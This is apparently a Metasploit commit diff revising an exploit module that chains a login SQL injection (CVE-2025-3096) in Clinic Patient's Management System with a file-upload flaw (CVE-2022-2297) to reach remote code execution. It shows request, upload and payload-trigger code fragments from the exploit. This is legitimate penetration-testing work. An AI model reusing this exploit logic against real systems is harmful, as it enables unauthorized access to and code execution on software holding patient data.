Addressing comments

msutovsky-r7 · msutovsky-r7 · commit 070bd54d3353 · 2025-05-19T07:17:14.000+02:00
diff --git a/documentation/modules/exploit/multi/http/clinic_pms_sqli_to_rce.md b/documentation/modules/exploit/multi/http/clinic_pms_sqli_to_rce.md
@@ -1,5 +1,6 @@
 ## Vulnerable Application
-Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.
+Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability
+(CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.
 
 ## Verification Steps
 
diff --git a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Post::File
   include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -20,7 +21,8 @@ def initialize(info = {})
           This module exploits an SQL injection in login portal, which allows to log in as admin. Next, it allows the attacker to upload malicious files through user modification to achieve RCE.
         },
         'Author' => [
-          'msutovsky-r7' # CVE-2025-3096, module developer
+          'msutovsky-r7', # CVE-2025-3096, module developer
+          'Ashish Kumar' # CVE-2022-2297
         ],
         'License' => MSF_LICENSE,
         'Platform' => 'php',
@@ -39,7 +41,7 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         }
       )
     )
@@ -67,7 +69,7 @@ def check
 
   def login_sqli
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + 'index.php'),
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'vars_post' =>
@@ -119,7 +121,7 @@ def upload_payload
     data_post << "--#{boundary}--\r\n"
 
     res = send_request_cgi({
-      'uri' => normalize_uri('/pms/update_user.php'),
+      'uri' => normalize_uri(target_uri.path, '/pms/update_user.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'ctype' => "multipart/form-data; boundary=#{boundary}",
@@ -133,7 +135,7 @@ def upload_payload
     fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
     fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location')
 
-    fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'congratulation.php?goto_page=users.php&message=user update successfully'
+    fail_with Failure::UnexpectedReply, 'Failed to update user when attempting to exploit' unless res.headers['Location'] == 'congratulation.php?goto_page=users.php&message=user update successfully'
     print_status('Malicious file uploaded..')
   end
 
@@ -145,7 +147,7 @@ def logout
     fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
     fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location')
 
-    fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'index.php'
+    fail_with Failure::UnexpectedReply, 'The Location header was not equal to \'index.php\' as expected' unless res.headers['Location'] == 'index.php'
     print_status('Logged out..')
     @cookie_jar.clear
   end
@@ -163,7 +165,7 @@ def trigger_payload
     )
 
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/update_user.php'),
+      'uri' => normalize_uri(target_uri.path, '/update_user.php'),
       'method' => 'GET',
       'keep_cookies' => true,
       'vars_get' =>
@@ -180,7 +182,7 @@ def trigger_payload
     fail_with Failure::PayloadFailed, 'Cannot find path to payload' if payload_path.blank?
 
     send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/' + payload_path),
+      'uri' => normalize_uri(target_uri.path, payload_path),
       'method' => 'GET',
       'keep_cookies' => true
     })
